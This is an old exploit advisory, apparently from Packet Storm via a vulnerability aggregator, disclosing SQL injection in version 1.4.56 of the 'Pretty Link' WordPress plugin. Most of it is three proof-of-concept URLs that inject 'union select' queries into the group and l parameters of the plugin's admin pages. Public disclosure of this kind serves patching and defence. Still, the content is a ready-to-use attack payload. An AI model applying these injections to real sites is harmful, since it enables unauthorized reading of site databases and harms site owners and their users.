WordPress Pretty Link Like 1.4.56 SQL Injection

🗓️ 27 Jun 2011 00:00:00Reported by MaKyOtOxType

packetstorm🔗 packetstormsecurity.com👁 20 Views

WordPress Pretty Link Like 1.4.56 SQL Injection vulnerabilit

`# Exploit Title: 'Pretty Link Like' WordPress Plugin 1.4.56 Multiple SQL  
Injection  
# Google Dork: N/A  
# Author: MaKyOtOx (special Pwet to ansx & Zizounette for #bitcoin)  
# Date: 27/06/2011  
# Software Link: http://wordpress.org/extend/plugins/pretty-link/  
# Version: 1.4.56 (not tested on previous versions)  
# Tested on: WhatEver OS  
# CVE : 0-Day  
  
  
PoC 1 :  
http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&group=-1union  
select @@version  
PoC 2 :  
http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&l=-1union  
select @@version  
PoC 3 :  
http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-links.php&group=-1union  
select @@version  
`

27 Jun 2011 00:00Current

0.2Low risk

Vulners AI Score0.2